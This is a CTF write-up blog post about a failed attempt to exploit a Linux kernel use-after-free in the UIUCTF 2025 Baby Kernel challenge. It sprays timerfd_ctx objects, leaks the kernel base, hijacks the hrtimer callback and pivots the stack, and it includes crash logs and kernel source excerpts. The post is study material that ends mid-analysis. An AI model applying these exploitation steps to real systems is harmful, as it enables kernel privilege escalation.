This is a continuation of the Kernel Exploitation Pitfalls #1 blog, so I recommend reading that first. I’ll be using the same Baby Kernel challenge from UIUCTF 2025.
Now, I could’ve gone ahead and used the modprobe_path technique discussed by h0mbre, with a more detailed write-up by lkmidas. It looks way simpler and more direct. But before going down that route, I wanted to try something similar to my first approach, only this time using a different structure.
While going through this great reference on kernel exploitation structs, timerfd_ctx immediately stood out. It looked promising because we could potentially use it to control the instruction pointer (RIP), leak the kernel base address, and maybe even leak the heap.
Interestingly, there are a couple of writeups that use timerfd_ctx for the HotRod challenge, so it’s clearly viable. But I wanted to do it unassisted. Even though it seemed straightforward at first (lol), some surprisingly interesting observations came up that definitely needed documenting. And oh, we failed in this blog as well.
Approach #2
Let’s first take a look at the structure we’ll be working with.
timerfd_ctx
The timerfd_ctx structure can be backed by either an hrtimer or an alarm. For this exploration, I chose to go with the hrtimer path, since it results in the kernel eventually calling the timer’s callback after the specified interval. That callback is the function pointer inside hrtimer, which returns an enum hrtimer_restart; I’ll refer to it as the hrtimer_restart function from here on.
This function takes a pointer to an hrtimer as its argument, and if our assumption is correct, that should point back to the same hrtimer inside our timerfd_ctx. Conveniently, hrtimer is the first field in the timerfd_ctx struct, which means the argument is also the address of the very start of our object.
That opens up an opportunity. If the kernel ends up calling the hrtimer_restart function, and we control the timerfd_ctx layout in memory, a gadget placed there could pivot into our ROP chain, effectively treating timerfd_ctx as our fake stack.
At this point, both RDI and R14 should point to the timerfd_ctx, which makes it an ideal candidate for stack pivoting.
struct hrtimer {
    struct timerqueue_node node;
    ktime_t _softexpires;
    enum hrtimer_restart (*function)(struct hrtimer *);
    struct hrtimer_clock_base *base;
    u8 state;
    u8 is_rel;
    u8 is_soft;
    u8 is_hard;
};

struct timerfd_ctx {
    union {
        struct hrtimer tmr;
        struct alarm alarm;
    } t;
    ktime_t tintv;
    ktime_t moffs;
    wait_queue_head_t wqh;
    u64 ticks;
    int clockid;
    short unsigned expired;
    short unsigned settime_flags; /* to show in fdinfo */
    struct rcu_head rcu;
    struct list_head clist;
    spinlock_t cancel_lock;
    bool might_cancel;
};
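To see where the interesting fields land when the object is read as an array of 8-byte values, here is a small user-space sketch that mirrors the hrtimer layout quoted above and computes the offsets. It assumes an x86_64 build where ktime_t is a signed 64-bit integer and structure layout randomization is off; the helper names are made up for this illustration and the real kernel layout should still be checked in a debugger.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* User-space mirrors of the kernel structs quoted above.
 * Assumptions: x86_64, ktime_t is a signed 64-bit value,
 * no structure layout randomization. */
typedef int64_t ktime_t;

struct rb_node {
    unsigned long __rb_parent_color;
    struct rb_node *rb_right;
    struct rb_node *rb_left;
};

struct timerqueue_node {
    struct rb_node node;
    ktime_t expires;
};

enum hrtimer_restart { HRTIMER_NORESTART, HRTIMER_RESTART };

struct hrtimer {
    struct timerqueue_node node;
    ktime_t _softexpires;
    enum hrtimer_restart (*function)(struct hrtimer *);
    void *base; /* struct hrtimer_clock_base * in the kernel */
    uint8_t state, is_rel, is_soft, is_hard;
};

/* Index of the callback pointer when the object is viewed as uint64_t[]. */
size_t function_qword_index(void)
{
    return offsetof(struct hrtimer, function) / sizeof(uint64_t);
}

/* Index of the red-black tree parent/color word in the same view. */
size_t rb_parent_qword_index(void)
{
    return offsetof(struct hrtimer, node.node.__rb_parent_color) / sizeof(uint64_t);
}
```

Under these assumptions the callback pointer sits at qword index 5 and the tree bookkeeping word at index 0, which are the two slots that matter for the rest of this post.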
Allocating a timerfd_ctx struct
We can use the code below to create an hrtimer with a specified timeout.
int timer_fd = timerfd_create(CLOCK_MONOTONIC, 0);
// arming the timer
struct itimerspec timer_spec = {0};
timer_spec.it_value.tv_nsec = 100000; // 100μs
// timer_spec.it_value.tv_sec = 0; // 0 seconds
timerfd_settime(timer_fd, 0, &timer_spec, NULL);
Executing the hrtimer_restart function
Waiting for the specified amount of time should be enough to trigger it.
How do we exploit this?
This looks much simpler compared to the previous method.
- Allocate and free heap memory using our vulnerable driver.
- Spray timerfd_ctx structs into the freed heap and leak the kernel base to calculate gadget addresses.
- Place a ROP gadget where hrtimer_restart is expected, so that it pivots RSP to RDI.
- Place the actual ROP chain at the start of the timerfd_ctx.
Exploitation
Try #1
1. Allocate and free our heap through the vulnerable driver.
int vuln_fd = open("/dev/vuln", O_RDWR);
if (ioctl(vuln_fd, ALLOC, &alloc_size) != 0) {
    perror("ALLOC failed");
    return -1;
}
if (ioctl(vuln_fd, FREE) != 0) {
    perror("FREE failed");
    return -1;
}
2. Allocate a timerfd_ctx in our freed heap and leak base addresses.
Let’s spray a bunch of timerfd_ctx structs to improve our chances.
char *uaf_buf = malloc(alloc_size);
printf("uaf_buf: %p\n", uaf_buf);
wait_for_enter(); // just a function waiting for me to press enter.
struct itimerspec timer_spec = {0};
timer_spec.it_value.tv_sec = 10; // 10 seconds
for (; spray_count < 1; spray_count++) {
    timer_fds[spray_count] = timerfd_create(CLOCK_REALTIME, 0);
}
for (int i = 0; i < spray_count; i++) {
    timerfd_settime(timer_fds[i], 0, &timer_spec, NULL);
}
// Read through our heap
if (ioctl(vuln_fd, USE_READ, uaf_buf) != 0) {
    perror("USE_READ failed");
    free(uaf_buf);
    return -1; // do not keep using the freed buffer
}
uint64_t *leak = (uint64_t *)uaf_buf;
uint64_t timerfd_tmrproc = leak[5]; // hrtimer.function sits at qword index 5
base_kernel_address = timerfd_tmrproc - TIMERFD_TMRPROC_OFFSET;
printf("base_address: 0x%lx\n", base_kernel_address);
We get the following output, and the base_address is successfully leaked. This can be confirmed using a SUID binary.
./exploit
uaf_buf: 0x22f1840
base_address: 0xffffffffaf000000
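The base calculation is plain pointer arithmetic, and it can be checked against the addresses printed in the Try #4 run further down (timerfd_tmrproc 0xffffffff9bee6a20, base 0xffffffff9bc00000, gadget1 0xffffffff9be41107). The sketch below redoes that arithmetic. The offset 0x2e6a20 is derived from those two printed values and the unslid text base 0xffffffff81000000 is inferred from the gadget address; both are specific to this challenge kernel and should be treated as assumptions elsewhere. The 2 MiB alignment check is only a heuristic that happens to hold for every base printed in this post.

```c
#include <assert.h>
#include <stdint.h>

/* Values derived from addresses printed in this post (6.6.16 challenge
 * kernel). They are assumptions for any other kernel image. */
#define KERNEL_TEXT_UNSLID     0xffffffff81000000ULL
#define TIMERFD_TMRPROC_OFFSET 0x2e6a20ULL /* 0x...9bee6a20 - 0x...9bc00000 */
#define PIVOT_GADGET_UNSLID    0xffffffff81241107ULL

/* Kernel base = leaked callback pointer minus its offset in the image. */
uint64_t kernel_base_from_leak(uint64_t leaked_tmrproc)
{
    return leaked_tmrproc - TIMERFD_TMRPROC_OFFSET;
}

/* Rebase an address taken from the unslid image onto the leaked base. */
uint64_t rebase_gadget(uint64_t kernel_base, uint64_t unslid_addr)
{
    return kernel_base + (unslid_addr - KERNEL_TEXT_UNSLID);
}

/* Heuristic sanity check: upper 32 bits all ones and 2 MiB aligned. */
int looks_like_kernel_base(uint64_t base)
{
    return (base >> 32) == 0xffffffffULL && (base & 0x1fffffULL) == 0;
}
```

A leak that fails the sanity check usually means the spray did not land in the freed chunk, so it is worth testing before writing anything back.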
3. Place a ROP gadget in hrtimer_restart’s place to point RSP to RDI/R14.
First, let’s confirm whether we can control RIP by setting it to 0xdeadbeefdeadbe00 using the following code:
leak[5] = 0xdeadbeefdeadbe00ULL;
if (ioctl(vuln_fd, USE_WRITE, uaf_buf) != 0) {
    printf("USE_WRITE failed\n");
    goto cleanup;
}
Output:
./exploit
uaf_buf: 0x772840
base_address: 0xffffffff8a000000
[+] Press Enter to continue
[ 2.531059] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input3
[ 12.511589] general protection fault: 0000 [#1] PREEMPT SMP NOPTI
[ 12.512248] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G O 6.6.16 #1
[ 12.512594] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux 1.16.3-1-1 04/01/2014
[ 12.513402] RIP: 0010:0xdeadbeefdeadbe00
[ 12.514261] Code: Unable to access opcode bytes at 0xdeadbeefdeadbdd6.
[ 12.514569] RSP: 0018:ff54d2c6c0003f28 EFLAGS: 00010082
[ 12.514889] RAX: ff2427c7c761f701 RBX: deadbeefdeadbe00 RCX: 0000000000000001
[ 12.515165] RDX: 0000000000000000 RSI: 0000000000000006 RDI: ff2427c7c1bf5800
[ 12.515430] RBP: ff2427c7c761f1c0 R08: ff2427c7c761f220 R09: 0000000000000000
[ 12.515669] R10: 0000000000000000 R11: ff54d2c6c0003ff8 R12: 0000000000000006
[ 12.515948] R13: ff2427c7c761f220 R14: ff2427c7c1bf5800 R15: ff2427c7c761f200
[ 12.516243] FS: 0000000000000000(0000) GS:ff2427c7c7600000(0000) knlGS:0000000000000000
[ 12.516524] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 12.516708] CR2: deadbeefdeadbe00 CR3: 0000000001c10000 CR4: 0000000000751ef0
[ 12.517032] PKRU: 55555554
[ 12.517227] Call Trace:
[ 12.517952] <IRQ>
[ 12.518263] ? die_addr+0x31/0x80
[ 12.518537] ? exc_general_protection+0x1af/0x3d0
[ 12.518753] ? check_preempt_curr+0x32/0x70
[ 12.518924] ? asm_exc_general_protection+0x26/0x30
[ 12.519156] ? __hrtimer_run_queues+0x10d/0x2a0
[ 12.519324] ? hrtimer_interrupt+0xf3/0x230
[ 12.519464] ? __sysvec_apic_timer_interrupt+0x4b/0x140
[ 12.519698] ? sysvec_apic_timer_interrupt+0x65/0x80
[ 12.519993] </IRQ>
[ 12.520146] <TASK>
As we can see, the kernel indeed crashes with our RIP value, which means the ROP chain can be placed at timerfd_ctx[0], while the stack pivot gadget can sit at timerfd_ctx[5].
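A side note on why the log above shows a general protection fault rather than a page fault: 0xdeadbeefdeadbe00 is not a canonical address, so the CPU rejects it before any page table lookup. The sketch below checks canonicality for a given virtual address width. The heap pointers in these logs (for example ff2427c7c1bf5800) are only canonical with 57-bit addresses, which suggests this kernel runs with five-level paging; that reading is my assumption and not something stated by the challenge.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* An address is canonical for `va_bits` of virtual address space when
 * bits 63 .. va_bits-1 are all zeros or all ones.
 * va_bits is 48 for four-level paging and 57 for five-level paging. */
bool is_canonical(uint64_t addr, unsigned va_bits)
{
    uint64_t top = addr >> (va_bits - 1);
    uint64_t all_ones = UINT64_MAX >> (va_bits - 1);
    return top == 0 || top == all_ones;
}
```

This also makes 0xdeadbeefdeadbe00 a convenient marker: it can never be a valid pointer, so any use of it shows up immediately in the crash log.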
This time, I was able to find a working stack pivot gadget:
// 0xffffffff81241107 : push rdi ; pop rsp ; xor eax, eax ; test edx, edx ; jle 0xffffffff81241114 ; jmp 0xffffffff81eafa50
// That jump leads to ret :D
Let’s test if we can successfully pivot to a ROP chain.
leak[0] = 0xdeadbeefdeadbe00ULL;
leak[5] = base_kernel_address + gadget1; // Overwrite with gadget address
if (ioctl(vuln_fd, USE_WRITE, uaf_buf) != 0) {
    printf("USE_WRITE failed\n");
    goto cleanup;
}
Output:
[+] Press Enter to continue
[ 2.655822] tsc: Refined TSC clocksource calibration: 3193.917 MHz
[ 2.656770] clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x2e09d7b4b0a, max_idle_ns: 440795227609 ns
[ 2.657417] clocksource: Switched to clocksource tsc
[ 2.680992] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input3
[ 3.607364] kernel tried to execute NX-protected page - exploit attempt? (uid: 0)
[ 3.607849] BUG: unable to handle page fault for address: ff35f6d141c05500
[ 3.608281] #PF: supervisor instruction fetch in kernel mode
[ 3.608569] #PF: error_code(0x0011) - permissions violation
[ 3.609039] PGD 6801067 P4D 6802067 PUD 6803067 PMD 1c1f063 PTE 8000000001c05163
[ 3.609723] Oops: 0011 [#1] PREEMPT SMP NOPTI
[ 3.610151] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G O 6.6.16 #1
[ 3.610453] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux 1.16.3-1-1 04/01/2014
[ 3.610936] RIP: 0010:0xff35f6d141c05500
[ 3.611523] Code: ff ff 00 55 c0 41 d1 f6 35 ff 10 00 00 00 00 00 00 00 46 00 01 00 00 00 00 00 08 55 c0 41 d1 f6 35 ff 18 00 00 00 00 00 00 00 <00> 55 c0 41 d1 f6 35 ff 10 f7 61 47 d1 f6 35 ff 00 00 00 00 00 00
[ 3.612247] RSP: 0018:ff35f6d141c05508 EFLAGS: 00010046
[ 3.612469] RAX: 0000000000000000 RBX: ffffffff83441107 RCX: 0000000000000001
[ 3.612746] RDX: 0000000000000000 RSI: 0000000000000002 RDI: ff35f6d141c05500
[ 3.612993] RBP: ff35f6d14761f1c0 R08: ff35f6d14761f220 R09: 0000000000000000
[ 3.613258] R10: 0000000000000000 R11: ff7a6da980003ff8 R12: 0000000000000002
[ 3.613540] R13: ff35f6d14761f220 R14: ff35f6d141c05500 R15: ff35f6d14761f200
[ 3.613933] FS: 0000000000000000(0000) GS:ff35f6d147600000(0000) knlGS:0000000000000000
Interesting: instead of seeing 0xdeadbeefdeadbe00 at RIP, we get 0xff35f6d141c05500, which matches the value of RDI. If you debug this in GDB, you’ll notice that the value stored at timerfd_ctx[0] changes after the struct is allocated.
After cleaning up the code a bit and running it again, I ended up hitting the following error:
[+] Press Enter to continue
[ 4.251144] general protection fault, probably for non-canonical address 0xdeadbeefdeadbe08: 0000 [#1] PREEMPT SMP NOPTI
[ 4.251823] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G O 6.6.16 #1
[ 4.252121] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux 1.16.3-1-1 04/01/2014
[ 4.252580] RIP: 0010:rb_insert_color+0x18/0x140
[ 4.253106] Code: 1f 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa 48 8b 07 48 85 c0 0f 84 ba 00 00 00 48 8b 10 f6 c2 01 75 59 <48> 8b 4a 08 48 39 c1 74 55 48 85 c9 74 05 f6 01 01 74 7c 48 8b 48
[ 4.253868] RSP: 0018:ffffffffaa003dc0 EFLAGS: 00010046
[ 4.254132] RAX: ff1ae31b01c03f00 RBX: ff1ae31b04e1f710 RCX: ff1ae31b01c03f10
[ 4.254420] RDX: deadbeefdeadbe00 RSI: ff1ae31b04e1f220 RDI: ff1ae31b04e1f710
[ 4.254695] RBP: 0000000000000000 R08: ff1ae31b04e1f220 R09: 0000000000018001
[ 4.254963] R10: 0000000000000000 R11: 0000000000000007 R12: 0000000000018001
[ 4.255255] R13: 00000001125c34c0 R14: ff1ae31b04e1f200 R15: 000000000001f1c0
[ 4.255594] FS: 0000000000000000(0000) GS:ff1ae31b04e00000(0000) knlGS:0000000000000000
[ 4.255956] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 4.256182] CR2: deadbeefdeadbe08 CR3: 0000000001c10000 CR4: 0000000000751ef0
[ 4.256516] PKRU: 55555554
[ 4.256709] Call Trace:
[ 4.257587] <TASK>
[ 4.257944] ? die_addr+0x31/0x80
[ 4.258135] ? exc_general_protection+0x1af/0x3d0
[ 4.258380] ? asm_exc_general_protection+0x26/0x30
[ 4.258616] ? rb_insert_color+0x18/0x140
[ 4.258768] timerqueue_add+0x66/0xb0
[ 4.258968] enqueue_hrtimer+0x2a/0x80
[ 4.259107] hrtimer_start_range_ns+0xf5/0x350
[ 4.259288] ? get_next_timer_interrupt+0x7a/0x110
[ 4.259442] tick_nohz_idle_stop_tick+0x233/0x2a0
[ 4.259597] ? sched_clock+0x10/0x30
[ 4.259747] do_idle+0x1d4/0x220
[ 4.259857] cpu_startup_entry+0x25/0x30
[ 4.259972] rest_init+0xc0/0xc0
[ 4.260083] arch_call_rest_init+0x9/0x30
[ 4.260294] start_kernel+0x414/0x670
[ 4.260459] x86_64_start_reservations+0x18/0x30
[ 4.260670] x86_64_start_kernel+0xc5/0xd0
[ 4.260817] secondary_startup_64_no_verify+0x178/0x17b
[ 4.261075] </TASK>
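It appears the crash occurs inside the rb_insert_color function, which rebalances a red-black tree after a node has been inserted. RDX holds our marker 0xdeadbeefdeadbe00 and the faulting address is the marker plus 8, so the tree code is dereferencing our overwritten first qword as if it were a node pointer.
Let’s take a closer look at the hrtimer structure: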
struct rb_node {
    unsigned long __rb_parent_color;
    struct rb_node *rb_right;
    struct rb_node *rb_left;
} __attribute__((aligned(sizeof(long))));

struct timerqueue_node {
    struct rb_node node;
    ktime_t expires;
};

struct hrtimer {
    struct timerqueue_node node;
    ktime_t _softexpires;
    enum hrtimer_restart (*function)(struct hrtimer *);
    struct hrtimer_clock_base *base;
    u8 state;
    u8 is_rel;
    u8 is_soft;
    u8 is_hard;
};
Reviewing the kernel source reveals the following:
SYSCALL_DEFINE2(timerfd_create, int, clockid, int, flags)
{
    struct timerfd_ctx *ctx;
    // some other stuff
    ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
    // some other stuff
    hrtimer_init(&ctx->t.tmr, clockid, HRTIMER_MODE_ABS);
}

static void __hrtimer_init(struct hrtimer *timer, clockid_t clock_id,
                           enum hrtimer_mode mode)
{
    timerqueue_init(&timer->node);
}

static inline void timerqueue_init(struct timerqueue_node *node)
{
    RB_CLEAR_NODE(&node->node);
}

#define RB_CLEAR_NODE(node) \
    ((node)->__rb_parent_color = (unsigned long)(node))
We can observe that the node field is initialized to point to itself when we call timerfd_create(). But what about rb_insert_color?
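The self-pointer is easy to reproduce in user space. The sketch below copies the RB_CLEAR_NODE macro quoted above together with its counterpart RB_EMPTY_NODE (which timerqueue_add checks further down) and shows that clearing a node overwrites whatever was in its first qword with the node's own address. The helper first_qword_is_self is made up for this illustration.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

struct rb_node {
    unsigned long __rb_parent_color;
    struct rb_node *rb_right;
    struct rb_node *rb_left;
};

/* Same definitions as the kernel macros, copied for user space. */
#define RB_CLEAR_NODE(node) \
    ((node)->__rb_parent_color = (unsigned long)(node))
#define RB_EMPTY_NODE(node) \
    ((node)->__rb_parent_color == (unsigned long)(node))

/* Returns 1 if the first 8 bytes of `n` hold n's own address. */
int first_qword_is_self(const struct rb_node *n)
{
    uint64_t first;
    memcpy(&first, n, sizeof(first));
    return first == (uint64_t)(uintptr_t)n;
}
```

Since the rb_node is the very first member of timerfd_ctx, this is the same slot the exploit tries to use as timerfd_ctx[0].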
SYSCALL_DEFINE4(timerfd_settime, int, ufd, int, flags,
                const struct __kernel_itimerspec __user *, utmr,
                struct __kernel_itimerspec __user *, otmr)
{
    ret = do_timerfd_settime(ufd, flags, &new, &old);
}

static int do_timerfd_settime(int ufd, int flags,
                              const struct itimerspec64 *new,
                              struct itimerspec64 *old)
{
    struct timerfd_ctx *ctx;
    ret = timerfd_setup(ctx, flags, new);
}

static int timerfd_setup(struct timerfd_ctx *ctx, int flags,
                         const struct itimerspec64 *ktmr)
{
    // somewhere
    hrtimer_start(&ctx->t.tmr, texp, htmode);
}

static inline void hrtimer_start(struct hrtimer *timer, ktime_t tim,
                                 const enum hrtimer_mode mode)
{
    hrtimer_start_range_ns(timer, tim, 0, mode);
}

static int __hrtimer_start_range_ns(struct hrtimer *timer, ktime_t tim,
                                    u64 delta_ns, const enum hrtimer_mode mode,
                                    struct hrtimer_clock_base *base)
{
    // lot of stuff
    first = enqueue_hrtimer(timer, new_base, mode);
    // lot of stuff
}

static int enqueue_hrtimer(struct hrtimer *timer,
                           struct hrtimer_clock_base *base,
                           enum hrtimer_mode mode)
{
    return timerqueue_add(&base->active, &timer->node);
}
/**
 * timerqueue_add - Adds timer to timerqueue.
 *
 * @head: head of timerqueue
 * @node: timer node to be added
 *
 * Adds the timer node to the timerqueue, sorted by the node's expires
 * value. Returns true if the newly added timer is the first expiring timer in
 * the queue.
 */
bool timerqueue_add(struct timerqueue_head *head, struct timerqueue_node *node)
{
    /* Make sure we don't add nodes that are already added */
    WARN_ON_ONCE(!RB_EMPTY_NODE(&node->node));
    return rb_add_cached(&node->node, &head->rb_root, __timerqueue_less);
}

/**
 * rb_add_cached() - insert @node into the leftmost cached tree @tree
 * @node: node to insert
 * @tree: leftmost cached tree to insert @node into
 * @less: operator defining the (partial) node order
 *
 * Returns @node when it is the new leftmost, or NULL.
 */
static __always_inline struct rb_node *
rb_add_cached(struct rb_node *node, struct rb_root_cached *tree,
              bool (*less)(struct rb_node *, const struct rb_node *))
{
    struct rb_node **link = &tree->rb_root.rb_node;
    struct rb_node *parent = NULL;
    bool leftmost = true;
    while (*link) {
        parent = *link;
        if (less(node, parent)) {
            link = &parent->rb_left;
        } else {
            link = &parent->rb_right;
            leftmost = false;
        }
    }
    rb_link_node(node, parent, link);
    rb_insert_color_cached(node, tree, leftmost);
    return leftmost ? node : NULL;
}

static inline void rb_insert_color_cached(struct rb_node *node,
                                          struct rb_root_cached *root,
                                          bool leftmost)
{
    if (leftmost)
        root->rb_leftmost = node;
    rb_insert_color(node, &root->rb_root);
}
While diving deeper into this may not yield direct value for exploitation, it’s clear that the kernel uses red-black trees to manage timers. Specifically, the first 8 bytes of timerfd_ctx (the node’s __rb_parent_color field) are overwritten as part of this bookkeeping: they point to the structure itself after timerfd_create(), and they are rewritten again when the node is linked into the tree as the timer is armed with timerfd_settime().
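The link step can be modelled in user space as well. The sketch below performs the same walk as rb_add_cached() and then does what rb_link_node() does: it stores the parent pointer in the new node's first word and clears both children. The recoloring and rotations of rb_insert_color() are deliberately left out, so this is a plain binary search tree and only illustrates which fields get written. The function name toy_timerqueue_add is made up for this example.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

struct rb_node {
    unsigned long __rb_parent_color;
    struct rb_node *rb_right;
    struct rb_node *rb_left;
};

struct timerqueue_node {
    struct rb_node node; /* first member, so the two addresses coincide */
    int64_t expires;
};

/* Simplified insert ordered by `expires`: same link walk as
 * rb_add_cached(), without the rebalancing of rb_insert_color(). */
void toy_timerqueue_add(struct rb_node **root, struct timerqueue_node *tn)
{
    struct rb_node **link = root;
    struct rb_node *parent = NULL;

    while (*link) {
        parent = *link;
        struct timerqueue_node *p = (struct timerqueue_node *)parent;
        link = (tn->expires < p->expires) ? &parent->rb_left
                                          : &parent->rb_right;
    }

    /* This is what rb_link_node() does to the new node. */
    tn->node.__rb_parent_color = (unsigned long)parent;
    tn->node.rb_left = tn->node.rb_right = NULL;
    *link = &tn->node;
}
```

Whatever the exploit wrote into the first three qwords before arming is gone after this step, and the neighbours in the tree now hold pointers to the node as well.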
Try #2
Now that the modification is known to occur after a short delay, we can introduce a brief pause before overwriting timerfd_ctx[0], with the goal of racing the kernel’s logic and gaining control over the structure in time.
usleep(20); // pause for 20μs before writing
if (ioctl(vuln_fd, USE_WRITE, uaf_buf) != 0) {
    printf("USE_WRITE failed\n");
    goto cleanup;
}
Output:
[+] Press Enter to continue
[ 2.592776] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input3
[ 2.976739] general protection fault, probably for non-canonical address 0xf608c383480b8b58: 0000 [#1] PREEMPT SMP NOPTI
[ 2.977266] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G O 6.6.16 #1
[ 2.977491] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux 1.16.3-1-1 04/01/2014
[ 2.977819] RIP: 0010:rb_next+0x18/0x50
[ 2.978216] Code: 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa 48 8b 0f 48 39 cf 74 33 48 8b 57 08 48 85 d2 74 1d 48 89 d0 <48> 8b 52 10 48 85 d2 75 f4 c3 cc cc cc cc 48 3b 78 08 75 15 48 8b
[ 2.978730] RSP: 0018:ff6627f000003f10 EFLAGS: 00010086
[ 2.978881] RAX: f608c383480b8b48 RBX: ff13089641987128 RCX: 0000000000000001
[ 2.979044] RDX: f608c383480b8b48 RSI: ff13089641987128 RDI: ff13089641987128
[ 2.979224] RBP: ff1308964761f220 R08: 0000000000000004 R09: 0000000000000000
[ 2.979392] R10: 0000000000000000 R11: ff6627f000003ff8 R12: 0000000000000006
[ 2.979579] R13: ff1308964761f220 R14: ff13089641987128 R15: ff1308964761f200
[ 2.979767] FS: 0000000000000000(0000) GS:ff13089647600000(0000) knlGS:0000000000000000
[ 2.979966] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 2.980109] CR2: f608c383480b8b58 CR3: 0000000001c10000 CR4: 0000000000751ef0
[ 2.980321] PKRU: 55555554
[ 2.980465] Call Trace:
[ 2.981147] <IRQ>
[ 2.981390] ? die_addr+0x31/0x80
[ 2.981515] ? exc_general_protection+0x1af/0x3d0
[ 2.981630] ? asm_exc_general_protection+0x26/0x30
[ 2.981765] ? rb_next+0x18/0x50
[ 2.981850] timerqueue_del+0x1f/0x50
[ 2.981984] __hrtimer_run_queues+0xdf/0x2a0
[ 2.982105] hrtimer_interrupt+0xf3/0x230
[ 2.982219] __sysvec_apic_timer_interrupt+0x4b/0x140
[ 2.982339] sysvec_apic_timer_interrupt+0x65/0x80
[ 2.982561] </IRQ>
[ 2.982624] <TASK>
[ 2.982671] asm_sysvec_apic_timer_interrupt+0x1a/0x20
[ 2.982897] RIP: 0010:default_idle+0xf/0x20
Now rb_next() gets called, probably by one of the other functions that keep the red-black tree up to date (the trace shows timerqueue_del), and there could be more.
Try #3
We can try to rewrite the heap just before the timer is about to expire, so that none of the tree maintenance running in the meantime touches our corrupted node. We get the following output:
./exploit
uaf_buf: 0x688840
base_address: 0xffffffff81800000
[ 2.531285] BUG: kernel NULL pointer dereference, address: 0000000000000000
[ 2.531656] #PF: supervisor write access in kernel mode
[ 2.531821] #PF: error_code(0x0002) - not-present page
[ 2.531982] PGD 1c02067 P4D 1c18067 PUD 1c2b067 PMD 0
[ 2.532274] Oops: 0002 [#1] PREEMPT SMP NOPTI
[ 2.532515] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G O 6.6.16 #1
[ 2.533046] RIP: 0010:rb_erase+0x18b/0x3a0
[ 2.533398] Code: 48 83 c0 01 48 89 01 c3 cc cc cc cc c3 cc cc cc cc 48 89 46 10 e9 17 ff ff ff 48 8b 56 10 48 8d 41 01 48 89 51 08 48 89 4e 10 <48> 89 02 48 8b 01 48 89 06 48 89 31 48 83 f8 03 0f 86 96 00 00 00
[ 2.533843] RSP: 0018:ff48cf3480003f10 EFLAGS: 00010046
[ 2.533986] RAX: ff1fe4150198b129 RBX: ff1fe4150761f710 RCX: ff1fe4150198b128
[ 2.534140] RDX: 0000000000000000 RSI: ff1fe41501c06500 RDI: ff1fe4150761f710
[ 2.534307] RBP: ff1fe4150761f220 R08: ff1fe4150761f220 R09: ff1fe41501bb9790
[ 2.534479] R10: ff1fe4150762b580 R11: ff48cf3480003ff8 R12: 0000000000000002
[ 2.534649] R13: ff1fe4150761f220 R14: ff1fe4150761f710 R15: ff1fe4150761f200
[ 2.534964] FS: 0000000000000000(0000) GS:ff1fe41507600000(0000) knlGS:0000000000000000
[ 2.535235] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 2.535412] CR2: 0000000000000000 CR3: 0000000001c12000 CR4: 0000000000751ef0
[ 2.535663] PKRU: 55555554
[ 2.535804] Call Trace:
[ 2.536553] <IRQ>
[ 2.536884] ? __die+0x1e/0x60
[ 2.537021] ? page_fault_oops+0x17c/0x470
[ 2.537131] ? exc_page_fault+0x6b/0x150
[ 2.537278] ? asm_exc_page_fault+0x26/0x30
[ 2.537437] ? rb_erase+0x18b/0x3a0
[ 2.537543] timerqueue_del+0x2e/0x50
[ 2.537695] __hrtimer_run_queues+0xdf/0x2a0
[ 2.537826] hrtimer_interrupt+0xf3/0x230
[ 2.537947] __sysvec_apic_timer_interrupt+0x4b/0x140
[ 2.538082] sysvec_apic_timer_interrupt+0x65/0x80
[ 2.538290] </IRQ>
[ 2.538350] <TASK>
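For reference, the "write just before expiry" step of Try #3 could be timed roughly as sketched below: record the monotonic time right before arming, then sleep until a small lead time before the expected expiry. This is not the code used in this post; the function names and the lead value are made up, and user-space sleeps only give approximate timing.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE /* for clock_nanosleep() under strict -std=c11 */
#endif
#include <assert.h>
#include <time.h>

#define NSEC_PER_SEC 1000000000LL

/* Returns t + delta_ns (delta_ns may be negative), normalized so that
 * 0 <= tv_nsec < NSEC_PER_SEC. */
struct timespec timespec_add_ns(struct timespec t, long long delta_ns)
{
    long long total = (long long)t.tv_nsec + delta_ns;
    t.tv_sec += (time_t)(total / NSEC_PER_SEC);
    total %= NSEC_PER_SEC;
    if (total < 0) {
        total += NSEC_PER_SEC;
        t.tv_sec -= 1;
    }
    t.tv_nsec = (long)total;
    return t;
}

/* Sleeps until `lead_ns` before `armed_at + interval_ns` on
 * CLOCK_MONOTONIC. Returns 0 on success or an errno value. */
int sleep_until_just_before(struct timespec armed_at,
                            long long interval_ns, long long lead_ns)
{
    struct timespec wake = timespec_add_ns(armed_at, interval_ns - lead_ns);
    return clock_nanosleep(CLOCK_MONOTONIC, TIMER_ABSTIME, &wake, NULL);
}
```

The idea would be to call clock_gettime(CLOCK_MONOTONIC, ...) immediately before timerfd_settime(), pass that timestamp as armed_at, and issue the USE_WRITE ioctl as soon as the sleep returns.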
Digging deep again, I came across this:
static void __run_hrtimer(struct hrtimer_cpu_base *cpu_base,
                          struct hrtimer_clock_base *base,
                          struct hrtimer *timer, ktime_t *now,
                          unsigned long flags) __must_hold(&cpu_base->lock)
{
    enum hrtimer_restart (*fn)(struct hrtimer *);
    // between bazillion other stuff
    __remove_hrtimer(timer, base, HRTIMER_STATE_INACTIVE, 0);
